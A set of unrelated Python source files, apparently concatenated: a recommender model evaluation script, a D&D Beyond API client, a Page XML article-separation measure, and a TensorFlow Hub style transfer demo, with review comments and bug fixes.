    print model_id
def do_eval(model_id, get_roc=False, get_map=False, get_p=False, start_user=0, num_users=10000, batch=False, predictions=[], predictions_index=[], meta=""):
    """Resolve a model's settings and run evaluate() on its stored predictions.

    Ids without the substring 'model' are parsed as ground-truth style ids
    ("<prefix>_<fact>_<dim>_<dataset>"); otherwise the settings are looked up
    in the shared trained-models TSV. Predictions are loaded from
    PREDICTIONS_DIR when not supplied by the caller.

    :raises ValueError: if the trained-models file cannot be read (or the
        model is missing from it) after 100 retries
    """
    if 'model' not in model_id:
        # Ground-truth style id: derive the settings directly from the id.
        items = model_id.split('_')
        model_settings = dict()
        model_settings['fact'] = items[1]
        model_settings['dim'] = int(items[2])
        model_settings['dataset'] = items[3]
        model_arch = dict()
        if model_settings['fact'] == 'class':
            model_arch['final_activation'] = 'softmax'
        else:
            model_arch['final_activation'] = 'linear'
        model_settings['configuration'] = "gt"
        str_config = model_id
    else:
        # The models file may be written concurrently by training jobs, so
        # transient read/parse errors are retried (up to 100 times, 1s apart).
        read = False
        x=0
        # BUG FIX: the original condition was 'while not read or x >= 100',
        # which never terminates on persistent failure; the retry cap only
        # works with 'and x < 100'.
        while not read and x < 100:
            try:
                trained_models = pd.read_csv(common.DEFAULT_TRAINED_MODELS_FILE, sep='\t')
                model_config = trained_models[trained_models["model_id"] == model_id]
                if model_config.empty:
                    raise ValueError("Can't find the model %s in %s" %
                                     (model_id, common.DEFAULT_TRAINED_MODELS_FILE))
                model_config = model_config.to_dict(orient="list")
                read = True
            except Exception:
                # Swallow and retry; narrowed from a bare 'except:'.
                pass
            x+=1
            time.sleep(1)
        if not read:
            # BUG FIX: previously fell through with model_config unbound (NameError).
            raise ValueError("Can't read the model %s from %s" %
                             (model_id, common.DEFAULT_TRAINED_MODELS_FILE))
        # NOTE(review): eval() on TSV fields executes arbitrary code if the file
        # is untrusted; kept for compatibility with the existing file format.
        model_settings=eval(model_config['dataset_settings'][0])
        model_arch=eval(model_config['model_arch'][0])
        model_training=eval(model_config['training_params'][0])
        str_config = json.dumps(model_settings)+"\n"+json.dumps(model_arch)+"\n"+json.dumps(model_training)+"\n"
        if meta != "" and "meta_suffix" not in model_settings:
            model_settings["meta-suffix"] = meta
        model_settings["loss"] = model_training['loss_func']
    if predictions==[]:
        # No predictions passed in: load the ones stored for this model id.
        predictions=np.load(common.PREDICTIONS_DIR+'/pred_%s.npy' % (model_id))
        predictions_index=open(common.PREDICTIONS_DIR+'/index_pred_%s.tsv' % (model_id)).read().splitlines()
    binary_classification = False
    if model_settings["evaluation"] == "binary":
        binary_classification = True
    evaluate(model_id, model_settings, str_config, predictions, predictions_index, binary_classification, start_user, num_users, get_roc, get_map, get_p, batch)
if __name__ == "__main__":
    # Command-line entry point: parse flags and run the evaluation.
    parser = argparse.ArgumentParser(
        description='Evaluates the model',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument(dest="model_id",
                        type=str,
                        help='Identifier of the Model to evaluate')
    parser.add_argument('-roc',
                        '--roc',
                        dest="get_roc",
                        help='Roc-auc evaluation',
                        action='store_true',
                        default=False)
    parser.add_argument('-map',
                        '--map',
                        dest="get_map",
                        help='Map evaluation',
                        action='store_true',
                        default=False)
    parser.add_argument('-p',
                        '--precision',
                        dest="get_p",
                        help='Precision evaluation',
                        action='store_true',
                        default=False)
    parser.add_argument('-ms',
                        '--meta',
                        dest="meta",
                        help='Meta suffix',
                        default="")
    parser.add_argument('-su',
                        '--start_user',
                        dest="start_user",
                        type=int,
                        help='First user to start evaluation',
                        default=0)
    parser.add_argument('-nu',
                        '--num_users',
                        dest="num_users",
                        type=int,
                        help='Number of users for evaluation',
                        default=1000)
    # NOTE(review): --local_storage is parsed but never passed to do_eval — confirm intent.
    parser.add_argument('-ls',
                        '--local_storage',
                        dest="use_local_storage",
                        help='Set if use local copy of matrices in the node',
                        action='store_true',
                        default=False)
    parser.add_argument('-b',
                        '--batch',
                        dest="batch",
                        help='Batch process in cluster',
                        action='store_true',
                        default=False)
    args = parser.parse_args()
    do_eval(args.model_id,args.get_roc,args.get_map,args.get_p,args.start_user,args.num_users,args.batch,meta=args.meta)
|
from pathlib import Path
import logging
import requests
import json
import time
import os
import src.config as config
# Configure the root logger at import time so the INFO messages below are emitted.
logging.basicConfig(level=logging.INFO)
class DnDBeyondProxy:
    """Small client for the D&D Beyond API.

    Authenticates with a Cobalt session key (exchanged for a short-lived
    bearer token), fetches items / monsters / spells, and dumps the JSON
    payloads under ``<output_folder>/raw/`` or ``<output_folder>/processed/``.
    """

    def __init__(self, cobalt_key, output_folder=None):
        """
        :param cobalt_key: D&D Beyond CobaltSession cookie value used to authenticate
        :param output_folder: destination for dumped JSON; defaults to ../data/output
        """
        self._last_auth = None               # epoch seconds of the last auth request
        self._token = None                   # current bearer token (None until first auth)
        self._token_death_timestamp = None   # epoch seconds when the token expires
        self._cobalt = cobalt_key
        self._output_folder = os.path.join('..', 'data', 'output') if not output_folder else output_folder

        # Get D&D Beyond mapping JSON file
        logging.info('Loading mapping.json')
        with open(os.path.join('..', 'meta', 'mapping.json'), mode='r', encoding='utf8') as fd:
            self._mapping = json.load(fd)

        # Build id -> name lookup tables from the mapping file
        self._stealth_map = {x['id']: x['name'] for x in self._mapping['stealthCheckTypes']}
        self._attack_map = {x['id']: x['name'] for x in self._mapping['rangeTypes']}
        self._category_map = {x['id']: x['name'] for x in self._mapping['weaponCategories']}
        self._source_map = {x['id']: x['name'] for x in self._mapping['sources']}
        self._armor_map = {x['id']: x['name'] for x in self._mapping['armorTypes']}
        self._gear_map = {x['id']: x['name'] for x in self._mapping['gearTypes']}

    def _authenticate(self):
        """Obtain a bearer token if none is held or the current one has expired.

        :raises ConnectionError: if the auth endpoint response has no token
        """
        if not self._token or self._token_death_timestamp <= time.time():
            logging.info('Requesting new bearer token')
            try:
                headers = {'Cookie': 'CobaltSession={0}'.format(self._cobalt)}
                self._last_auth = time.time()
                result = requests.post(config.AUTH_URL, headers=headers).json()
                self._token = result['token']
                self._token_death_timestamp = self._last_auth + result['ttl']
            except KeyError:
                raise ConnectionError('Failed to authenticate using Cobalt key.')

    def _dump_data(self, data, filename, raw=True):
        """Write `data` as JSON to <output_folder>/{raw|processed}/<filename>,
        creating the directory if needed."""
        data_type = 'raw' if raw else 'processed'
        final_path = os.path.join(self._output_folder, data_type)
        Path(final_path).mkdir(parents=True, exist_ok=True)
        with open(os.path.join(final_path, filename), mode='w') as fd:
            json.dump(data, fd)

    def get_items(self):
        """Fetch the full item list and dump it to raw/items.json.

        :raises RuntimeError: if the response carries no 'data' payload
        """
        self._authenticate()
        try:
            headers = {'Authorization': 'Bearer {0}'.format(self._token)}
            result = requests.get(config.ITEMS_URL, headers=headers)
            result = result.json()
            self._dump_data(result['data'], 'items.json')
        except KeyError:
            raise RuntimeError('Failed to obtain items.')

    def get_monsters(self, skip_size=100):
        """Fetch all non-homebrew monsters page by page and dump them to raw/monsters.json.

        :param skip_size: page size used for both 'take' and the 'skip' increment
        :raises RuntimeError: if a response carries no 'data' payload
        """
        aggregator = []
        count_current = None
        skip = 0
        # Loop until a page comes back empty.
        while count_current is None or count_current > 0:
            self._authenticate()
            try:
                logging.info('Fetching {0} monsters after skipping {1}'.format(skip_size, skip))
                headers = {'Authorization': 'Bearer {0}'.format(self._token)}
                # BUG FIX: 'take' was hardcoded to 100 while 'skip' advanced by
                # skip_size, skipping or duplicating monsters whenever
                # skip_size != 100. Both must use the same page size.
                params = {'skip': skip, 'take': skip_size, 'showHomebrew': 'f'}
                result = requests.get(config.MONSTER_URL, headers=headers, params=params).json()
                count_current = len(result['data'])
                aggregator = [*aggregator, *result['data']]
                skip += skip_size
            except KeyError:
                raise RuntimeError('Failed to obtain monsters.')
        self._dump_data(aggregator, 'monsters.json')

    def get_spells(self):
        """Fetch level-20 spell lists for every class and dump the merged
        result to raw/spells.json.

        :raises RuntimeError: if a response carries no 'data' payload
        """
        classes = {x['id'] for x in self._mapping['classConfigurations']}
        aggregator = []
        for class_id in classes:
            logging.info('Fetching spells for class ID {0}'.format(class_id))
            self._authenticate()
            try:
                headers = {'Authorization': 'Bearer {0}'.format(self._token)}
                params = {'classId': class_id, 'classLevel': 20}
                result = requests.get(config.SPELLS_URL, headers=headers, params=params).json()['data']
                aggregator = [*aggregator, *result]  # Merge new results with the previous ones
            except KeyError:
                raise RuntimeError('Failed to obtain spells.')
        self._dump_data(aggregator, 'spells.json')

    def process_items(self, input_file=None):
        """Resolve numeric ids in a raw items dump to names and write the
        result to processed/items.json.

        :param input_file: raw items dump; defaults to ../data/output/raw/items.json
        """
        if not input_file:
            input_file = os.path.join('..', 'data', 'output', 'raw', 'items.json')
        output_file = os.path.join(self._output_folder, 'processed', 'items.json')

        # Read input file
        with open(input_file, mode='r', encoding='utf8') as fd:
            data = json.load(fd)

        logging.info('Processing items')
        result = [self._process_item(x) for x in data]

        # Write to file
        self._dump_data(result, 'items.json', raw=False)

    def _process_item(self, item):
        """ --- List of processed data ---
        <in items.json>  <=>  <in mapping.json>
        stealthCheck     <=>  stealthCheckTypes
        attackType       <=>  rangeTypes (Most likely guess?)
        categoryId       <=>  weaponCategories
        sourceId         <=>  sources
        armorTypeId      <=>  armorTypes
        gearTypeId       <=>  gearTypes
        """
        logging.debug('Processing item {0}'.format(item['name']))

        # Apply mappings (falsy ids — None or 0 — are left as None)
        item['stealthCheck'] = self._stealth_map[item['stealthCheck']] if item['stealthCheck'] else None
        item['attackType'] = self._attack_map[item['attackType']] if item['attackType'] else None
        item['category'] = self._category_map[item['categoryId']] if item['categoryId'] else None
        item['source'] = self._source_map[item['sourceId']] if item['sourceId'] else None
        for source in item['sources']:
            source['sourceName'] = self._source_map[source['sourceId']] if source['sourceId'] else None
        item['armorType'] = self._armor_map[item['armorTypeId']] if item['armorTypeId'] else None
        item['gearType'] = self._gear_map[item['gearTypeId']] if item['gearTypeId'] else None
        return item
|
# Repository: CITlabRostock/citlab-article-separation-new
# -*- coding: utf-8 -*-
import jpype
import numpy as np
import os
from argparse import ArgumentParser
from python_util.basic.flags import str2bool
from python_util.parser.xml.page.page import Page
from python_util.math.measure import f_measure
from article_separation_measure.eval_measure import BaselineMeasureEval
def get_data_from_pagexml(path_to_pagexml):
    """
    :param path_to_pagexml: file path
    :return: dictionary with the article / block ID's as keys and a list of corresponding baselines (given by polygons)
    as values
    """
    art_polygons_dict = {}

    try:
        # load the page xml file
        page_file = Page(path_to_xml=path_to_pagexml)
        # get all text lines article wise
        art_txtlines_dict = page_file.get_article_dict()
    # BUG FIX: the original "except():" matches the empty exception tuple and
    # therefore catches nothing — a broken Page XML crashed the script instead
    # of being reported and skipped.
    except Exception:
        print("!! Can not load the lines of the Page XML {} !!\n".format(path_to_pagexml))
        return art_polygons_dict

    for article_id in art_txtlines_dict:
        for txtline in art_txtlines_dict[article_id]:
            try:
                # get the baseline of the text line as polygon
                polygon = txtline.baseline.to_polygon()

                # skip baselines with less than two points
                if len(polygon.x_points) == len(polygon.y_points) > 1:
                    if article_id in art_polygons_dict:
                        art_polygons_dict[article_id].append(polygon)
                    else:
                        art_polygons_dict.update({article_id: [polygon]})
            # BUG FIX: same empty-tuple "except():" defect — e.g. a text line
            # with baseline None raised instead of being skipped.
            except Exception:
                print("!! 'NoneType' object with id {} has no attribute 'to_polygon' !!\n".format(txtline.id))
                continue

    return art_polygons_dict
def compute_baseline_detection_measure(polygon_dict_gt, polygon_dict_hy,
                                       min_tol=10, max_tol=30, rel_tol=0.25, poly_tick_dist=5):
    """
    :param polygon_dict_gt: ground truth article / block ID's with corresponding lists of polygons
    :param polygon_dict_hy: hypotheses article / block ID's with corresponding lists of polygons
    :param min_tol: MINIMUM distance tolerance which is not penalized
    :param max_tol: MAXIMUM distance tolerance which is not penalized
    :param rel_tol: fraction of estimated interline distance as tolerance values
    :param poly_tick_dist: desired distance (measured in pixels) of two adjacent pixels in the normed polygons
    :return: baseline detection measure ,i.e., r and p value (for all baselines and only for baselines assigned to
    articles / blocks)
    """
    # Flatten the per-article polygon lists; a key of None marks baselines
    # without an article / block assignment, which are excluded from the
    # "_without_none" variants.
    list_of_gt_polygons, list_of_gt_polygons_without_none = [], []
    list_of_hy_polygons, list_of_hy_polygons_without_none = [], []

    for gt_article_id in polygon_dict_gt:
        list_of_gt_polygons += polygon_dict_gt[gt_article_id]
        if gt_article_id is not None:
            list_of_gt_polygons_without_none += polygon_dict_gt[gt_article_id]
    for hy_article_id in polygon_dict_hy:
        list_of_hy_polygons += polygon_dict_hy[hy_article_id]
        if hy_article_id is not None:
            list_of_hy_polygons_without_none += polygon_dict_hy[hy_article_id]

    print("{:<100s} {:>10d} {:<1s} {:>10d}".
          format("number of ground truth baselines / hypotheses baselines",
                 len(list_of_gt_polygons), "/", len(list_of_hy_polygons)))
    print("{:<100s} {:>10d} {:<1s} {:>10d}".
          format("number of ground truth baselines with article ID's / hypotheses baselines with article ID's",
                 len(list_of_gt_polygons_without_none), "/", len(list_of_hy_polygons_without_none)))

    # create baseline measure evaluation
    bl_measure_eval = \
        BaselineMeasureEval(min_tol=min_tol, max_tol=max_tol, rel_tol=rel_tol, poly_tick_dist=poly_tick_dist)

    # baseline detection measure for all baselines
    # (None, None) signals "no ground truth at all"; (0, 0) signals "ground
    # truth present but nothing hypothesized".
    if len(list_of_gt_polygons) == 0:
        r_value_bd, p_value_bd = None, None
    elif len(list_of_hy_polygons) == 0:
        r_value_bd, p_value_bd = 0, 0
    else:
        bl_measure_eval.calc_measure_for_page_baseline_polys(polys_truth=list_of_gt_polygons,
                                                             polys_reco=list_of_hy_polygons)
        # The evaluator accumulates page results; [-1] is the run just performed.
        r_value_bd = bl_measure_eval.measure.result.page_wise_recall[-1]
        p_value_bd = bl_measure_eval.measure.result.page_wise_precision[-1]

    # baseline detection measure only for baselines assigned to articles / blocks
    if len(list_of_gt_polygons_without_none) == 0:
        r_value_bd_without_none, p_value_bd_without_none = None, None
    elif len(list_of_hy_polygons_without_none) == 0:
        r_value_bd_without_none, p_value_bd_without_none = 0, 0
    else:
        bl_measure_eval.calc_measure_for_page_baseline_polys(polys_truth=list_of_gt_polygons_without_none,
                                                             polys_reco=list_of_hy_polygons_without_none)
        r_value_bd_without_none = bl_measure_eval.measure.result.page_wise_recall[-1]
        p_value_bd_without_none = bl_measure_eval.measure.result.page_wise_precision[-1]

    return r_value_bd, p_value_bd, r_value_bd_without_none, p_value_bd_without_none
def get_greedy_sum(array):
    """Greedy assignment sum of a matrix.

    Repeatedly takes the largest remaining entry, adds it to the running sum,
    and removes its row and column from further consideration (by setting them
    to -1). Assumes the input entries are non-negative.

    :param array: matrix as numpy array (left unmodified; a copy is consumed)
    :return: greedy sum of the given matrix
    """
    work = np.copy(array)
    acc = 0
    while True:
        # Position of the largest element still in play.
        row, col = np.unravel_index(np.argmax(work), work.shape)
        # Every entry already consumed has been overwritten with -1.
        if work[row, col] < 0:
            break
        acc += work[(row, col)]
        # Retire this row/column pair.
        work[row, :] = -1.0
        work[:, col] = -1.0
    return acc
def run_eval(gt_file, hy_file, min_tol=10, max_tol=30, rel_tol=0.25, poly_tick_dist=5):
    """
    :param gt_file: ground truth Page XML file (with baselines and article / block ID's)
    :param hy_file: hypotheses Page XML file (with baselines and article / block ID's)
    :param min_tol: MINIMUM distance tolerance which is not penalized
    :param max_tol: MAXIMUM distance tolerance which is not penalized
    :param rel_tol: fraction of estimated interline distance as tolerance values
    :param poly_tick_dist: desired distance (measured in pixels) of two adjacent pixels in the normed polygons
    :return: baseline detection measure, baseline detection measure only for baselines assigned to articles / blocks and
    the article / block segmentation measure
    """
    if not gt_file.endswith(".xml") or not hy_file.endswith(".xml"):
        print("!! Ground truth and hypotheses file have to be in Page XML format !!\n")
        return None, None, None

    gt_polygons_dict = get_data_from_pagexml(path_to_pagexml=gt_file)
    hy_polygons_dict = get_data_from_pagexml(path_to_pagexml=hy_file)

    bd_r_value, bd_p_value, bd_r_value_without_none, bd_p_value_without_none \
        = compute_baseline_detection_measure(polygon_dict_gt=gt_polygons_dict, polygon_dict_hy=hy_polygons_dict,
                                             min_tol=min_tol, max_tol=max_tol, rel_tol=rel_tol,
                                             poly_tick_dist=poly_tick_dist)
    if bd_r_value is None:
        print("!! Ground truth Page XML has no baselines !!\n")
        return None, None, None
    if bd_r_value_without_none is None:
        print("!! Ground truth Page XML has no article / block ID's !!\n")
        bd_f_value = f_measure(recall=bd_r_value, precision=bd_p_value)
        return (bd_r_value, bd_p_value, bd_f_value), None, None

    bd_f_value = f_measure(recall=bd_r_value, precision=bd_p_value)
    bd_f_value_without_none = f_measure(recall=bd_r_value_without_none, precision=bd_p_value_without_none)

    # baselines without an article / block ID are irrelevant for our measure
    gt_polygons_dict.pop(None, None)
    # number of GT articles
    number_of_gt_articles = len(gt_polygons_dict)
    hy_polygons_dict.pop(None, None)
    # number of HY articles
    number_of_hy_articles = len(hy_polygons_dict)

    print("{:<100s} {:>10d} {:<1s} {:>10d}\n".
          format("number of ground truth articles / hypotheses articles",
                 number_of_gt_articles, "/", number_of_hy_articles))

    if number_of_hy_articles == 0:
        return (bd_r_value, bd_p_value, bd_f_value), \
               (bd_r_value_without_none, bd_p_value_without_none, bd_f_value_without_none), (0, 0, 0)

    ##########
    # computation of the weighted r and p matrix
    # BUG FIX: np.float was a deprecated alias of the builtin float and is
    # removed in NumPy >= 1.24; use float directly.
    r_matrix = np.zeros((number_of_gt_articles, number_of_hy_articles), dtype=float)
    p_matrix = np.zeros((number_of_gt_articles, number_of_hy_articles), dtype=float)

    # create baseline measure evaluation
    bl_measure_eval = BaselineMeasureEval(min_tol=min_tol, max_tol=max_tol, rel_tol=rel_tol,
                                          poly_tick_dist=poly_tick_dist)
    hy_weighting_append = True
    gt_block_weighting_factors = []
    hy_block_weighting_factors = []

    # baseline detection measure between every ground truth and hypotheses article / block
    for gt_article_index, gt_article_id in enumerate(gt_polygons_dict):
        gt_block_weighting_factors.append(float(len(gt_polygons_dict[gt_article_id])))

        for hy_article_index, hy_article_id in enumerate(hy_polygons_dict):
            # hy weighting factors only need to be collected on the first gt pass
            if hy_weighting_append:
                hy_block_weighting_factors.append(float(len(hy_polygons_dict[hy_article_id])))

            bl_measure_eval.calc_measure_for_page_baseline_polys(polys_truth=gt_polygons_dict[gt_article_id],
                                                                 polys_reco=hy_polygons_dict[hy_article_id])
            r_matrix[gt_article_index, hy_article_index] = bl_measure_eval.measure.result.page_wise_recall[-1]
            p_matrix[gt_article_index, hy_article_index] = bl_measure_eval.measure.result.page_wise_precision[-1]

        hy_weighting_append = False

    # multiplication of the rows (row-wise weighting for recall) / columns (column-wise weighting for precision)
    # by the corresponding weighting factors
    gt_block_weighting = \
        np.asarray([1 / sum(gt_block_weighting_factors) * x for x in gt_block_weighting_factors], dtype=float)
    hy_block_weighting = \
        np.asarray([1 / sum(hy_block_weighting_factors) * x for x in hy_block_weighting_factors], dtype=float)

    r_matrix = r_matrix * np.expand_dims(gt_block_weighting, axis=1)
    p_matrix = p_matrix * hy_block_weighting

    as_r_value = get_greedy_sum(array=r_matrix)
    as_p_value = get_greedy_sum(array=p_matrix)
    as_f_value = f_measure(recall=as_r_value, precision=as_p_value)

    return (bd_r_value, bd_p_value, bd_f_value), \
           (bd_r_value_without_none, bd_p_value_without_none, bd_f_value_without_none), \
           (as_r_value, as_p_value, as_f_value)
def run_measure(gt_files, hy_files, min_tol, max_tol, rel_tol, poly_tick_dist, verbose=True):
    """Run run_eval() over paired GT/HY Page XML files and print per-file
    (if verbose) plus averaged measures.

    :param gt_files: list of ground truth Page XML file paths
    :param hy_files: list of hypotheses Page XML file paths (same length/order)
    :param min_tol: MINIMUM distance tolerance which is not penalized
    :param max_tol: MAXIMUM distance tolerance which is not penalized
    :param rel_tol: fraction of estimated interline distance as tolerance values
    :param poly_tick_dist: desired distance (in pixels) of adjacent pixels in the normed polygons
    :param verbose: if True, print a result table for every file pair
    """
    if len(gt_files) != len(hy_files):
        print(f"Length of GT list ({len(gt_files)}) has to match length of HY list ({len(hy_files)})!")
        exit(1)

    # start java virtual machine to be able to execute the java code
    jpype.startJVM(jpype.getDefaultJVMPath())

    # Running sums of (r, p, f) plus the count of files that produced a value.
    bd_average, bd_counter = [0, 0, 0], 0
    bd_without_none_average, bd_without_none_counter = [0, 0, 0], 0
    as_average, as_counter = [0, 0, 0], 0

    if verbose:
        for i, (gt_file, hy_file) in enumerate(zip(gt_files, hy_files)):
            print("-" * 125)
            print("Ground truth file: ", gt_file)
            print("Hypotheses file  : ", hy_file, "\n")

            tuple_bd, tuple_bd_without_none, tuple_as = run_eval(gt_file=gt_file, hy_file=hy_file,
                                                                 min_tol=min_tol, max_tol=max_tol,
                                                                 rel_tol=rel_tol, poly_tick_dist=poly_tick_dist)

            print("{:<50s} {:>10s} {:>10s} {:>10s}".format("Mode", "R-value", "P-value", "F-value"))
            # A None tuple means the measure was undefined for this file (see run_eval).
            if tuple_bd is not None:
                print("{:<50s} {:>10f} {:>10f} {:>10f}".
                      format("baseline detection measure - all baselines", tuple_bd[0], tuple_bd[1], tuple_bd[2]))
                bd_average = [bd_average[i] + tuple_bd[i] for i in range(len(bd_average))]
                bd_counter += 1
            else:
                print("{:<50s} {:>10s} {:>10s} {:>10s}".
                      format("baseline detection measure - all baselines", "-", "-", "-"))
            if tuple_bd_without_none is not None:
                print("{:<50s} {:>10f} {:>10f} {:>10f}".
                      format("baseline detection measure - without none",
                             tuple_bd_without_none[0], tuple_bd_without_none[1], tuple_bd_without_none[2]))
                bd_without_none_average = \
                    [bd_without_none_average[i] + tuple_bd_without_none[i] for i in range(len(bd_without_none_average))]
                bd_without_none_counter += 1
            else:
                print("{:<50s} {:>10s} {:>10s} {:>10s}".
                      format("baseline detection measure - without none", "-", "-", "-"))
            if tuple_as is not None:
                print("{:<50s} {:>10f} {:>10f} {:>10f}".
                      format("article / block segmentation measure", tuple_as[0], tuple_as[1], tuple_as[2]))
                as_average = [as_average[i] + tuple_as[i] for i in range(len(as_average))]
                as_counter += 1
            else:
                print("{:<50s} {:>10s} {:>10s} {:>10s}".
                      format("article / block segmentation measure", "-", "-", "-"))
    else:
        # Same accumulation as above, without the per-file tables.
        for i, (gt_file, hy_file) in enumerate(zip(gt_files, hy_files)):
            tuple_bd, tuple_bd_without_none, tuple_as = run_eval(gt_file=gt_file, hy_file=hy_file,
                                                                 min_tol=min_tol, max_tol=max_tol,
                                                                 rel_tol=rel_tol, poly_tick_dist=poly_tick_dist)
            if tuple_bd is not None:
                bd_average = [bd_average[i] + tuple_bd[i] for i in range(len(bd_average))]
                bd_counter += 1
            if tuple_bd_without_none is not None:
                bd_without_none_average = \
                    [bd_without_none_average[i] + tuple_bd_without_none[i] for i in range(len(bd_without_none_average))]
                bd_without_none_counter += 1
            if tuple_as is not None:
                as_average = [as_average[i] + tuple_as[i] for i in range(len(as_average))]
                as_counter += 1

    # Averages over the files that actually produced each measure.
    print("-" * 125)
    print("-" * 125)
    print("AVERAGE VALUES")
    print("{:<50s} {:>10s} {:>10s} {:>10s} {:>25s} {:>10s}".
          format("Mode", "R-value", "P-value", "F-value", "valid evaluated files", "all files"))
    if bd_counter > 0:
        print("{:<50s} {:>10f} {:>10f} {:>10f} {:>25d} {:>10d}".
              format("baseline detection measure - all baselines",
                     1 / bd_counter * bd_average[0], 1 / bd_counter * bd_average[1], 1 / bd_counter * bd_average[2],
                     bd_counter, len(gt_files)))
    else:
        print("{:<50s} {:>10s} {:>10s} {:>10s} {:>25d} {:>10d}".
              format("baseline detection measure - all baselines", "-", "-", "-", bd_counter, len(gt_files)))
    if bd_without_none_counter > 0:
        print("{:<50s} {:>10f} {:>10f} {:>10f} {:>25d} {:>10d}".
              format("baseline detection measure - without none",
                     1 / bd_without_none_counter * bd_without_none_average[0],
                     1 / bd_without_none_counter * bd_without_none_average[1],
                     1 / bd_without_none_counter * bd_without_none_average[2],
                     bd_without_none_counter, len(gt_files)))
    else:
        print("{:<50s} {:>10s} {:>10s} {:>10s} {:>25d} {:>10d}".
              format("baseline detection measure - without none", "-", "-", "-",
                     bd_without_none_counter, len(gt_files)))
    if as_counter > 0:
        print("{:<50s} {:>10f} {:>10f} {:>10f} {:>25d} {:>10d}".
              format("article / block segmentation measure",
                     1 / as_counter * as_average[0], 1 / as_counter * as_average[1], 1 / as_counter * as_average[2],
                     as_counter, len(gt_files)))
    else:
        print("{:<50s} {:>10s} {:>10s} {:>10s} {:>25d} {:>10d}".
              format("article / block segmentation measure", "-", "-", "-", as_counter, len(gt_files)))

    # shut down the java virtual machine
    jpype.shutdownJVM()
if __name__ == "__main__":
    # Command-line entry point: read the GT/HY list files, align the pairs and
    # run the measure.
    parser = ArgumentParser()
    # command-line arguments
    parser.add_argument('--path_to_gt_xml_lst', type=str, required=True,
                        help="path to the lst file containing the file paths of the ground truth Page XML's")
    parser.add_argument('--path_to_hy_xml_lst', type=str, required=True,
                        help="path to the lst file containing the file paths of the hypotheses Page XML's")
    parser.add_argument('--min_tol', type=int, default=-1,
                        help="MINIMUM distance tolerance which is not penalized, -1 for dynamic calculation")
    parser.add_argument('--max_tol', type=int, default=-1,
                        help="MAXIMUM distance tolerance which is not penalized, -1 for dynamic calculation")
    parser.add_argument('--rel_tol', type=float, default=0.25,
                        help="fraction of estimated interline distance as tolerance values")
    parser.add_argument('--poly_tick_dist', type=int, default=5,
                        help="desired distance (measured in pixels) of two adjacent pixels in the normed polygons")
    parser.add_argument('--verbose', nargs='?', const=True, default=True, type=str2bool,
                        help="print evaluation for every single file in addition to overall summary")

    flags = parser.parse_args()

    # list of xml file paths
    # NOTE(review): the open() handles in these comprehensions are never closed — relies on GC.
    gt_xml_files = [line.rstrip('\n') for line in open(flags.path_to_gt_xml_lst, "r")]
    hy_xml_files = [line.rstrip('\n') for line in open(flags.path_to_hy_xml_lst, "r")]

    # filter hy files by gt file (for train, val, test splits)
    # A HY file is kept when any GT base name is a substring of its base name;
    # both lists are then sorted by base name to align the pairs positionally.
    gt_base_names = [os.path.splitext(os.path.basename(file))[0] for file in gt_xml_files]
    hy_xml_files = list(sorted([file for file in hy_xml_files if any([gt in os.path.basename(file) for gt in gt_base_names])], key=os.path.basename))
    gt_xml_files = list(sorted(gt_xml_files, key=os.path.basename))

    run_measure(gt_xml_files, hy_xml_files, flags.min_tol, flags.max_tol, flags.rel_tol,
                flags.poly_tick_dist, flags.verbose)
|
# fast_stylize.py
import functools
import os
from matplotlib import gridspec
import matplotlib.pylab as plt
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
# Report the runtime environment so the user can confirm eager mode / GPU.
print("TF Version: ", tf.__version__)
print("TF-Hub version: ", hub.__version__)
print("Eager mode enabled: ", tf.executing_eagerly())
# NOTE(review): tf.test.is_gpu_available() is deprecated in TF2 in favour of
# tf.config.list_physical_devices('GPU'); left unchanged here.
print("GPU available: ", tf.test.is_gpu_available())
#Define image loading and visualization functions { display-mode: "form" }
def crop_center(image):
    """Crop a batched image tensor to a centered square.

    The square side is the smaller of the two spatial dimensions, i.e.
    axes 1 and 2 of the (batch, height, width, channels) tensor.
    """
    height, width = image.shape[1], image.shape[2]
    side = height if height < width else width
    top = (height - width) // 2 if height > width else 0
    left = (width - height) // 2 if width > height else 0
    return tf.image.crop_to_bounding_box(image, top, left, side, side)
@functools.lru_cache(maxsize=None)
def load_image(image_url, image_size=(256, 256), preserve_aspect_ratio=True):
    """Load an image from a URL and preprocess it for the stylization model.

    Downloads (and caches) the file, converts it to a float32 batch tensor
    normalized to [0, 1], replicates grayscale images to 3 channels,
    center-crops to a square and resizes to ``image_size``.
    """
    # Cache image file locally (keep at most the last 128 chars as filename).
    image_path = tf.keras.utils.get_file(os.path.basename(image_url)[-128:], image_url)
    # Load and convert to float32 numpy array, add batch dimension, and normalize to range [0, 1].
    img = plt.imread(image_path).astype(np.float32)[np.newaxis, ...]
    if img.max() > 1.0:
        img = img / 255.
    if len(img.shape) == 3:
        # Grayscale (batch, h, w): replicate to three channels.
        img = tf.stack([img, img, img], axis=-1)
    img = crop_center(img)
    # BUG FIX: honor the caller's preserve_aspect_ratio argument instead of
    # hardcoding True, which silently ignored the parameter.
    img = tf.image.resize(img, image_size, preserve_aspect_ratio=preserve_aspect_ratio)
    return img
def show_n(images, titles=('',)):
    """Display a row of batched images side by side with optional titles."""
    count = len(images)
    widths = [img.shape[1] for img in images]
    panel = (widths[0] * 6) // 320
    plt.figure(figsize=(panel * count, panel))
    grid = gridspec.GridSpec(1, count, width_ratios=widths)
    for idx, img in enumerate(images):
        plt.subplot(grid[idx])
        plt.imshow(img[0], aspect='equal')
        plt.axis('off')
        plt.title(titles[idx] if idx < len(titles) else '')
    plt.show()
#Load example images { display-mode: "form" }
# BUG FIX: the previous URLs pointed at GitHub's HTML viewer pages
# ('/blob/...'), which serve an HTML document rather than JPEG bytes, so
# plt.imread could not decode them. Fetch the raw file contents instead.
content_image_url = 'https://raw.githubusercontent.com/sha256burim/Implementation-of-TensorFlow-Fast-GAN-Neural-Style-Transfer/main/face1.jpg'
style_image_url = 'https://raw.githubusercontent.com/sha256burim/Implementation-of-TensorFlow-Fast-GAN-Neural-Style-Transfer/main/van.jpg'
output_image_size = 500
# The content image size can be arbitrary.
content_img_size = (output_image_size, output_image_size)
# The style prediction model was trained with image size 256 and it's the
# recommended image size for the style image (though, other sizes work as
# well but will lead to different results).
#style_img_size = (256, 256) #keep it at 256.
style_img_size = (500, 500)
content_image = load_image(content_image_url, content_img_size)
style_image = load_image(style_image_url, style_img_size)
# Light smoothing of the style image before stylization.
style_image = tf.nn.avg_pool(style_image, ksize=[3,3], strides=[1,1], padding='SAME')
show_n([content_image, style_image], ['Content image', 'Style image'])
# Load TF-Hub module.
